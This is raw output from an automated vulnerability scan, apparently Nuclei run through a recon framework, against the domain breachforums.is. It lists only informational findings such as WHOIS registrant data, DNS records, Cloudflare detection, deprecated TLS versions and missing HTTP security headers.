P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [noc@cloudflare.com,abuse@flokinet.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls12]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls13]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:8443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:8443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:8443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:8443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:8443 [tls12]                    
P5 - INFO, Robots.txt Detected,http://breachforums.is:80/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Robots.txt Detected,http://breachforums.is:8080/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Server Header Disclosure - HTTP, http://breachforums.is:8080//, Server: cloudflare
P5 - INFO, Robots.txt Detected,https://breachforums.is:443/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Server Header Disclosure - HTTPS, https://breachforums.is:8443//, server: cloudflare
====================================================================================
====================================================================================•x[2023-09-17](21:39)x•
 SCAN COMPLETE! 
====================================================================================•x[2023-09-17](21:39)x•